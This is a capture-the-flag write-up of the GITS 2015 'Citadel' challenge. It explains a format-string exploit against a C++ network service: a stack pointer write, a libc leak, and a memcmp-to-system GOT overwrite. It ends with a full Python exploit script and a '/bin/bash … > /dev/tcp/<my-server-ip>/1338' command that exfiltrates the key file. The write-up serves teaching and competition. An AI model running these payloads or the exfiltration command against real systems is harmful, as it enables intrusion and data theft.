GITS Teaser 2015 CTF - Citadel Writeup
14 December 2014 by skuCitadel was one of the three Ghost in the Shellcode Teaser 2015 CTF challenges and the only binary exploitation (or pwnable) challenge.
The binary (decompressed):
$ shasum -a256 citadel
9abb2cd19e81a61b663c886cd01ff1442c8a7ba5e476d07c78ebbe7a587fed96 citadel
$ file citadel
citadel: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=7a9a32ed82281a52e484facfb7fa216fc9d1896d, stripped
The binary links to libc++.so.1
, so on my Ubuntu 14.04 machine I first had to
$ sudo apt-get install libc++1
to make the binary run locally.
Big picture
The exploit for this challenge is quite interesting in my opinion, so I will focus more on the exploit building approach instead of dissecting the entire binary. Furthermore, I only reversed small parts of the binary necessary to understand the protocol and treated the rest as a black-box. As we can see, the binary is a stripped 64-bit C++ binary. It uses regular expressions, std::strings, smart pointers, inheritance, virtual function calls, and much more. This means it has great potential for a massive time sink. Luckily, I quickly spotted something fishy which turned out to be exploitable 2-3 hours later - more about that soon!
The main()
function looks like this:
.text:000000000040E560 main proc near
.text:000000000040E560 push rbx
.text:000000000040E561 mov edi, 13C4h ; tcp port 5060
.text:000000000040E566 call create_server_socket
.text:000000000040E56B mov ebx, eax
.text:000000000040E56D lea rsi, handler
.text:000000000040E574 mov edi, 0Eh
.text:000000000040E579 call _signal
.text:000000000040E57E mov edi, ebx ; server_socket_fd
.text:000000000040E580 call run_server_loop
.text:000000000040E580 main endp
It creates a TCP socket listening on port 5060
for incoming connections and then runs in an infinite loop in run_server_loop()
, which does the standard accept->fork->drop-privs->handle-user dance.
The user handling introduces our first C++ element: the spawned child process allocates a C++ object using operator new
and then calls its virtual function at offset +0x50
which also runs an infinite loop to handle this user's requests.
The infinite loop user handler at 0x401D90
looks like this:
This looks rather daunting, but once we get over the bloat introduced by C++, the code is quite simple:
- Receive until newline
- Check the user input for the regular expression:
r"(.+) (.+) GITSSIP/(.+)\r?"
- Depending on the request type (first group), allocate a request object
- Call the request object's handler function (virtual method)
- Repeat
Some types of requests will need to supply more data during step 4, and some requests will just receive an "OK" or "UNIMPLEMENTED" response. The possible requests are:
- "REGISTER"
- "DIRECTORY"
- "CANCEL"
- "OPTIONS"
- "INVITE"
After looking through the respective handlers, I concluded that "REGISTER" is useful because it allows us to allocate user-controlled data on the server (but not on the stack, remember - this is C++ using std::strings!) and "DIRECTORY" is useful because it allows us to search for our data, but more importantly: the handler uses asprintf
, which seems very out of place in such a neat C++ binary!
The "REGISTER" handler looks even scarier than the user handler, but once again the logic is fairly straight forward: request key-value pairs from the user needed for the registration process.
The following is a sample of a valid "REGISTER" request.
$ nc localhost 5060
REGISTER foo GITSSIP/0.1
To: a
From: a
Expires: 0
Common Name: a
Contact: a
GITSSIP/0.1 200 OK
If some of the fields are missing, we will get a "Malformed Header"
error response and the process will terminate. The most important field here is the "Common Name"
, because we can search for this entry again later and have it printed out:
DIRECTORY foo GITSSIP/0.1
Search: a
GITSSIP/0.1 200 OK
0 : [Status: IDLE, To: a, From: a, Expires: 80, Contact: a, Name: a]
Luckily for us, the binary does not use stringstreams or boost::format (cough) or the likes: it uses asprintf - lets give this a spin!
$ nc localhost 5060
REGISTER foo GITSSIP/0.1
To: %llx:%llx:%llx:%llx
From: a
Expires: 0
Common Name: a
Contact: a
GITSSIP/0.1 200 OK
DIRECTORY foo GITSSIP/0.1
Search: a
GITSSIP/0.1 200 OK
0 : [Status: IDLE, To: 50:a010:1b0fc50:1b0fed0, From: a, Expires: 28375280, Contact: a, Name: a]
Well what do you know, turns out user supplied format strings might be bad for you after all! Once I had this I stopped reversing the remaining 98% of the binary and instead focused on weaponizing this. It turned out to be more difficult than anticipated for multiple reasons:
- We have absolutely zero control over the stack at this point, so we can't just supply user input with a neat pointer to land on the stack and then use %param$n for glory
- ASLR is enabled so even if we had control over the stack we wouldn't know what to write where
- This is a 64-bit binary and we are on the clock (30 second alert until we get disconnected), so large
asprintf
outputs to write large values (64-bit pointers) is out of the question
Getting user-controlled values onto the stack
The binary receives our input byte-by-byte and stores it in a std::string, so we can't get our format string (including a pointer value) onto the stack trivially. Let's inspect the stack right before the asprintf call (your values will be different):
gdb-peda$ x/200xg $rsp
0x7fffbf64ec78: 0x0000000000403166 0x0000000001b0fed0
0x7fffbf64ec88: 0x0000000001b0f8f0 0x00006e00312e3006
0x7fffbf64ec98: 0x0000000000006202 0x0000000000000000
0x7fffbf64eca8: 0x0000000000000000 0x0000000001b0fe38
0x7fffbf64ecb8: 0x0000000001b0fe20 0x4f54434552002a02
0x7fffbf64ecc8: 0x00007fed6d005952 0x0000000001b0fbb0
0x7fffbf64ecd8: 0x0000000000000030 0x0000000000000000
0x7fffbf64ece8: 0x0000000001b0fdb0 0x0000000001b0fde0
0x7fffbf64ecf8: 0x0000000001b0fde0 0x0000000001b0f892
0x7fffbf64ed08: 0x0000000001b0f892 0x0000000001b0f700
0x7fffbf64ed18: 0x0000000001b0f889 0x0000000001b0f889
0x7fffbf64ed28: 0x0000000001b0f700 0x0000000001b0f892
0x7fffbf64ed38: 0x0000000001b0f892 0x0000000001b0f700
0x7fffbf64ed48: 0x0000000001b0f701 0x0000000001b0f889
0x7fffbf64ed58: 0x00007fed6dda61b0 0x00007fed6dda6510
0x7fffbf64ed68: 0x00007fed6dda6540 0x0000000100000000
0x7fffbf64ed78: 0x0000000000000002 0x0000000001b0f810
0x7fffbf64ed88: 0x0000000001b0f7e0 0x0000000001b0fa90
0x7fffbf64ed98: 0x0000000001b0f888 0x0000000001b0f870
0x7fffbf64eda8: 0x0000000001b0f6a0 0x0000000000401b80
0x7fffbf64edb8: 0x00007fffbf64ef10 0x00007fffbf64ede0
0x7fffbf64edc8: 0x0000000000401d70 0x0000000000000004
0x7fffbf64edd8: 0x0000000000401d36 0x0000000001b0f738
0x7fffbf64ede8: 0x0000000001b0f720 0x0000000001b0f6a0
0x7fffbf64edf8: 0x0000000000000000 0x0000000000000000
0x7fffbf64ee08: 0x000000000040e6f3 0x0000000000000000
0x7fffbf64ee18: 0x0000000000000003 0x0000000000000000
0x7fffbf64ee28: 0x000000000040e585 0x0000000000000000
0x7fffbf64ee38: 0x00007fed6d1f4ec5 0x0000000000000000
0x7fffbf64ee48: 0x00007fffbf64ef18 0x0000000100000000
0x7fffbf64ee58: 0x000000000040e560 0x0000000000000000
0x7fffbf64ee68: 0x8eac1ad3c20a731a 0x0000000000401b80
0x7fffbf64ee78: 0x00007fffbf64ef10 0x0000000000000000
0x7fffbf64ee88: 0x0000000000000000 0x7153641a1e8a731a
0x7fffbf64ee98: 0x7176c0ed5ef0731a 0x0000000000000000
0x7fffbf64eea8: 0x0000000000000000 0x0000000000000000
0x7fffbf64eeb8: 0x000000000040e800 0x00007fffbf64ef18
0x7fffbf64eec8: 0x0000000000000001 0x0000000000000000
0x7fffbf64eed8: 0x0000000000000000 0x0000000000401b80
0x7fffbf64eee8: 0x00007fffbf64ef10 0x0000000000000000
0x7fffbf64eef8: 0x0000000000401ba9 0x00007fffbf64ef08
0x7fffbf64ef08: 0x000000000000001c 0x0000000000000001
If you look closely at the end of this stack dump at address 0x00007fffbf64eee8
, you should see that the value in that stack location is a pointer into the stack itself, and it's very close at address 0x00007fffbf64ef10
. Likewise, the stack address 0x00007fffbf64ef00
contains the pointer value 0x00007fffbf64ef08
.
To summarize:
[0x00007fffbf64eee8] = 0x00007fffbf64ef10
[0x00007fffbf64ef10] = 0x0000000000000001
and
[0x00007fffbf64ef00] = 0x00007fffbf64ef08
[0x00007fffbf64ef08] = 0x000000000000001c
With some math followed by trial and error because math is hard, we can assign the following direct parameter access indices for the format string:
%82 -> 0x00007fffbf64eee8
%85 -> 0x00007fffbf64ef08
%86 -> 0x000000000000001c
%87 -> 0x0000000000000001
The following format string will write a user controlled value (5000 plus a bit more because the format string contains a bit more text) onto the stack at address 0x00007fffbf64ef10
: "%5000c%82$n"
The stack (only showing the relevant parts) will then look like this:
0x7fffbf64eee8: 0x00007fffbf64ef10 0x0000000000000000
0x7fffbf64eef8: 0x0000000000401ba9 0x00007fffbf64ef08
0x7fffbf64ef08: 0x000000000000001c 0x0000000000001388
We can now control values on the stack! Instead of writing some arbitrary value, lets put a pointer of interest into this location: any GOT entry address!
I've decided to go with the memcmp@got.plt
address 0x613098
= 6369432 decimal. The resulting format string contains other text (like the entry id, spaces etc.) which adds another 23 characters to the output, so we subtract that and get the following number format string: "%6369409c%82$n"
After asprintf
execution, the stack will look like this:
0x7fffbf64eee8: 0x00007fffbf64ef10 0x0000000000000000
0x7fffbf64eef8: 0x0000000000401ba9 0x00007fffbf64ef08
0x7fffbf64ef08: 0x000000000000001c 0x0000000000613098
%82 -> 0x00007fffbf64eee8
%85 -> 0x00007fffbf64ef08
%86 -> 0x000000000000001c
%87 -> 0x0000000000613098
We have now successfully written the pointer to the memcmp@got.plt
entry onto the stack - what now?
Leaking information about libc
The previous format string was so much fun, lets do it again! But this time, we use the direct parameter index 87 and the format %s: "libc leak here: >> %87$s <<"
When the server runs this format string, it will read out bytes of the memcmp@got.plt
entry until it hits a null-byte, and we will get a juicy address into libc back once we parse it properly:
libc_memcmp = struct.unpack('<Q', leaked_bytes.ljust(8, '\x00'))[0]
print('libc_memcmp address is: 0x%016x' % libc_memcmp) # 0x00007f871089bae0
Theoretically, our exploit would not need to survive past this point because the binary forks itself so ASLR does not matter anymore, but as long as we are careful we can peform the entire exploit (including the flag stealing) in one run without relying on the fork behaviour.
Locally, we can now compute the address of the system
function relative to memcmp
. system
is at 0x00007f8710781530
as we can see here:
0x00007f8710836e0d in recv () from /lib/x86_64-linux-gnu/libc.so.6
gdb-peda$ x/1xg 0x613098
0x613098 <memcmp@got.plt>: 0x00007f871089bae0
gdb-peda$ disas system
Dump of assembler code for function system:
0x00007f8710781530 <+0>: test rdi,rdi
0x00007f8710781533 <+3>: je 0x7f8710781540 <system+16>
0x00007f8710781535 <+5>: jmp 0x7f8710781060
0x00007f871078153a <+10>: nop WORD PTR [rax+rax*1+0x0]
0x00007f8710781540 <+16>: lea rdi,[rip+0x13721c] # 0x7f87108b8763
0x00007f8710781547 <+23>: sub rsp,0x8
0x00007f871078154b <+27>: call 0x7f8710781060
0x00007f8710781550 <+32>: test eax,eax
0x00007f8710781552 <+34>: sete al
0x00007f8710781555 <+37>: add rsp,0x8
0x00007f8710781559 <+41>: movzx eax,al
0x00007f871078155c <+44>: ret
End of assembler dump.
gdb-peda$ shell python -c "print(0x00007f871089bae0-0x00007f8710781530)"
1156528
Thus we get:
libc_system = libc_memcmp - 1156528
Taking over control, I hope you know your format strings
We know where system
is, but how do we hijack the control flow of the program? There are a couple of options:
- Leak stack addresses, overwrite any return address with system
- Overwrite a GOT entry
- Leak the main object's address and overwrite the vtable pointer
- Possibly more
Strategies 1 and 3 require a lot of work because we need to have our command string in %rdi
, so would probably have to setup a ROP stack first. I went with strategy 2 and changed the memcmp@got.plt
entry with the system address so the next time we send a request, the server will memcmp our input with the predefined request keywords like "REGISTER", but instead land in system with %rdi
pointing to our input!
We have one more problem to take care of: the system address is huge, so we can't just use one large format string write with %n, instead we will use two writes with %hn to write 2-byte values into the lower dword of the entry. The upper dword does not have to be changed because both memcmp and system have the same upper dword value of 0x00007fed
. This means we need to have the pointers 0x613098
and 0x61309a
on the stack so we can write the 2 half-words to the right positions.
For this, we can simply alter the first format string to the following: "%6369409c%82$n..%85$n"
This will write the value 0x613098
to 0x00007fffbf64eee8
(index 87) as before, and the value 0x613098+2 = 0x61309a
to address 0x00007fffbf64ef08
(index 86) because we added 2 dots (or any other 2 characters) to the format string. The stack locations will now look like this:
%82 -> 0x00007fffbf64eee8
%85 -> 0x00007fffbf64ef08
%86 -> 0x000000000061309a
%87 -> 0x0000000000613098
Perfect! We can now use indices 87 and 86 to overwrite the lower dword of the memcmp@got.plt
entry! It is important that we do this in one go, as otherwise further calls to memcmp will segfault while only half of the address has been altered.
Given the system address in libc_system, we compute the number of characters we have to print as follows:
lower_halfword = (libc_system & 0xffff) - 23 # 0x9519 = 38169
upper_halfword = ((libc_system >> 16) & 0xffff) - 23 # 0x6d0a = 27914
difference = 38169 - 27914 = 10255
Then we can build the following format string: "%27914c%86$hn%10255c%87$hn"
Note that the order is relevant here: we first write whichever halfword has a lower value, othrewise we would have to wrap around to 0xffff
and create a larger format string than necessary. When this is done, the memcmp@got.plt
entry will point to system instead - we are almost there!
Grabbing the key file
The next time we send a proper request, it will be matched with the regular expression and if the format is correct, it will be passed to memcmp (which is now system), so our last request has to be valid as well, otherwise we get disconnected:
Instead of 'REGISTER foo GITSSIP/0.1\n'
, we will send
/bin/bash -c "cat key > /dev/tcp/<my-server-ip>/1338" # foo GITSSIP/0.1\n
The regex will grab the first group '/bin/bash -c "cat key > /dev/tcp/<my-server-ip>/1338" #'
and then pass this to memcmp (system). :-)
Meanwhile on my server, I'm anxiously listening:
$ nc -v -l 1338
Connection from [*********] port 1338 [tcp/*] accepted (family 2, sport 41309)
key{Should have u****************t}
Luckily for me, I happened to have the same libc.so
locally, so the local exploit worked remotely as well (after fixing a different bug - I had the last format string order of the 2 half-words wrong) and team gn00bz got first-blood on citadel! Fantastic challenge, props to the creator(s)!
Complete exploit code
# WARNING: EXTREMELY UGLY CODE, CTF TIME PRESSURE AND ALL THAT!
# Author: @skusec
from Pwn import *
import time
# Simple wrapper around python's socket implementation, ignore.
s = Socket()
s.connect('citadel.2015.ghostintheshellcode.com', 5060)
# Direct parameter access indices.
ID1 = 87 # 87
ID2 = ID1 - 1 # 86
ID3 = ID1 - 5 # 82
ID4 = ID1 - 2 # 85
# Place the memcmp@got.plt address on the stack.
time.sleep(0.1)
s.sendall('''REGISTER foo GITSSIP/0.1
To: %6369409c%''' + str(ID3) + '''$n..%''' + str(ID4) + '''$n
From: a
Expires: 0
Common Name: b
Contact: a
DIRECTORY * GITSSIP/0.1
Search: *
''')
time.sleep(1.0)
# Receive a lot of chunk from the large asprintf call.
# Lots of magic values in this code, I was in a hurry. ;)
recvd = 0
while recvd < 6369432:
data = s.recv(6369532 - recvd)
recvd += len(data)
# Leak the libc memcmp address.
time.sleep(0.1)
s.sendall('''REGISTER foo GITSSIP/0.1
To: [[[%''' + str(ID1) + '''$s]]]
From: a
Expires: 0
Common Name: q
Contact: a
DIRECTORY * GITSSIP/0.1
Search: q
''')
time.sleep(1.0)
# Parse the address
buf = s.recv(1024)
address = buf.split('[[[')[1]
address = address.split(']]]')[0]
address = address.ljust(8, '\x00')
address = struct.unpack('<Q', address)[0]
system = address - 1156528
print('memcmp at: 0x%016x' % address)
print('system at: 0x%016x' % system)
# Split address.
syslower = system & 0xffff
syslower -= 23
sysupper = (system >> 16) & 0xffff
sysupper -= 23
# Write the system address into the memcmp@got.plt entry.
time.sleep(0.1)
s.sendall('''REGISTER foo GITSSIP/0.1
To: %''' + str(sysupper) + '''c%''' + str(ID2) + '''$hn%''' + str(syslower - sysupper) + '''c%''' + str(ID1) + '''$hn
From: a
Expires: 0
Common Name: p
Contact: a
DIRECTORY * GITSSIP/0.1
Search: p
''')
time.sleep(1.0)
# Collect cookies.
s.sendall('/bin/bash -c "cat key > /dev/tcp/<my-server-ip>/1338" # foo GITSSIP/0.1\n')
print('Flag should be on its way!')
GITS Teaser 2015 CTF - Don't Panic! Shift Keying! Writeup
Writeup for the signals task.
read more